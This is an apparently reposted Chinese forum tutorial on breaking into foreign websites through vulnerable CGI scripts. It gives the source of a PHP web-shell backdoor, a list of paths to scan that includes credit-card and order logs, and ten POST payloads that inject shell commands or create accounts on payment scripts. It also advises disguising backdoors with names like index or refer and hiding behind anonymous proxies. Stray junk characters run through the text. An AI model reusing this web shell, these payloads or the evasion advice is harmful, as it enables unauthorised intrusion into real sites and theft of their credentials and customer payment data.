CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
* e2 p; n8 b" S- s( m大家好 我是bboyhip  只是一名菜菜的exploiter
很开心来到贵论坛
这里让我感觉 很有技术交流的感觉
& I( _# \0 P5 K7 X/ y" N7 n  k% D我会长长来玩的
前言:
以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
. U1 I- k: H5 |% V7 X% i8 Z我门都知道 国外伺服器大多是linux 平台
所以有很多网站程序有6成都会使用cgi 脚本来管理
目录为/cgi-bin/

只是个人在实务上一些经验
写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
$ j0 }. N+ q+ p7 L, A- q讲解一下
$ J9 n* W# H. x8 a3 U5 [让没有基础的人很容易上手
. }9 V. L( A* ]
- |  P! F, L. q4 R以下内容跟帖回复才能看到
# V! w: e  o" [- `8 M- o! a; C/ z# P: O* i==============================
) P% F9 N  Y* S: X, D/ r
4 ~, n: G0 ?& Q, J第1部份: 何谓Shell?
Shell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.

4 x$ X2 D0 x9 \' o  L对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
) u1 ^8 E' P1 ~' D所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

* W4 A$ O- U: w第2部份: Unix 指令
以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
如 /home/www/site.com/cgi-bin/
! n, o6 W1 ?# b$ f% W& @  ~, p8 X) \ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
ls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
7 i1 S% V  G; m0 ?! G, n5 ^% Hls ../ -al: 详细列出上一层的资料夹及档案
cat: 显示档案内容
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
5 R! ?( I( R( A$ S" Owho: 显示谁login 至系统
0 G1 p3 M) H4 w" `( _# iman: 显示指令用法  
8 i" Q: [6 N: w0 A8 e, lman ls: 显示ls这指令的用法  
mkdir 建立目录
9 s4 ^& P0 i- U  E9 {6 P) B" vrmdir 删除目录
mv 移动档案
rm 删除档案
2 Y0 T: T. A' o7 B% ^6 w9 v8 b
第3部份: Shell的使用
例如:
, j+ G6 |/ g- d& D; Vhttp://site.com/refer.php
这是我的後门, 原代码如下:
<Form Action="#" Method="POST">
# U2 c6 J) ~2 c& L# u7 n9 B% W! X<Input type="text" name="cmd">
<Input type="Submit">
8 Q6 j; ?, N, q</Form>
<?php
! B0 ^- c/ P9 n0 J% c1 f/ K$cmd = $_POST['cmd'];
  S0 N% I! w/ R8 K: n6 O4 m9 e$Output = shell_exec($cmd);
) i* c" H& M. x4 L& uecho $Output;
  X: @) b& O* C" }2 ]?>
输入pwd, 可得到绝对路径:
  @0 P! [2 @* y2 I# S3 Y  U- X/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
: a5 S2 W7 O$ o3 h6 a
, L6 r) ~( _# A5 Q- I/ N5 `第4部份: 注意事项
/ x& A% G! G1 _: e, T- 使用匿名代理, 保障自己
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
! z7 q( j9 [" y0 P- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
0 t6 v9 S8 ^/ f# ?$ d- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
- g! T( L6 i: S- N( G不容易被发现.
- k9 I/ j; e0 A6 ^" t- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
2 G& e6 X6 L5 e' Y  o/ G这篇文章的重点是cgi 脚本攻击
' \7 \. F$ c" j+ @  h所以我用简单的叙述形容
开始讲解脚本入侵过程:
在这里提供一些方法思路让大家学习一下

1.一开始对一个网站进行cgi漏洞扫描
! }# `. m) [" G7 G4 c! L- b我们需要的东西有
! Y1 Q4 X& w8 U; Y8 Y扫洞工具 如:triton..等等
E表
如
/cgi-bin/add-passwd.cgi
" [5 o- j( t/ [; s% M; w7 `/WebShop/templates/cc.txt
6 I6 J+ V" z' }" X' s% `5 \/Admin_files/order.log
/orders/mountain.cfg
: K5 C0 [  A. [5 }1 d- n/cgi-sys/cart.pl
" g. E7 ?# F, u# i( @* w1 m+ U& z/scripts/cart.pl
) D; |4 b* e  i' E/htbin/cart.pl
0 b( ?2 n/ x& Z9 V! xE表来源可以是网路收寻或是自己的0 day

2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
一般都是在IE里先看一下的,记住这个返回码哦
6 W" |# b2 X$ _4 a# M0 ]9 SERROR:This script should be referenced with a METHOD of POST.
' V$ G6 r) y3 ]0 F( ~" d4 E5 r没有返回一定是假的
3.重来来了 很多人都会问我
8 C" ?2 c. [' y2 }# ^  n" P他扫到很多洞 但是不会使用
8 _( n9 m. {, _$ x. V$ G1 Q因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
- O/ J" I8 D) q1 i# j1 K* E可以是源代码分析 找出介质
& M: n3 ^: |0 c4 x7 {4 c或是用抓包工具 抓他的语法...等等
4 T0 X. V6 {% }: p3 K: y$ j
9 d7 x# I  S, W5 ~! |以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
, `& N* C+ _# ^7 K3 v" B5 _" x. k/index.cgi
wei=ren&gen=command
+ P# \. i# v$ f3 ?% u/passmaster.cgi
Action=Add&Username=Username&Password=Password
1 z7 x+ y' q# h$ ]: v, }  d: d/accountcreate.cgi
/ x7 s; z# R8 X, u  n8 Tusername=username&password=password&ref1=|echo;ls|
6 f. q8 d7 ^  f9 [% Y5 T: G- v/form.cgi
- D+ D- \' s0 X5 Tname=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
2 s: M' y9 P( t( f! E3 y2 F) {5 q/ccbill-local.asp
! p$ G' G! p8 g! W% X  Tpost_values=username:password
+ _, v# L3 s1 B% q1 |/count.cgi
pinfile=|echo;ls -la;exit|
/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
% k* S. u- n7 d  |1 _/verotelrum.pl
% r+ |7 A( E% V$ T- T2 v: @+ nvercode=username:password:dseegsow:add:amount<&30>
/af.cgi_browser_out=|echo;ls -la;exit;|

  u9 G" f! v' {6 k- y: Q今天就讲到这  感谢大家支持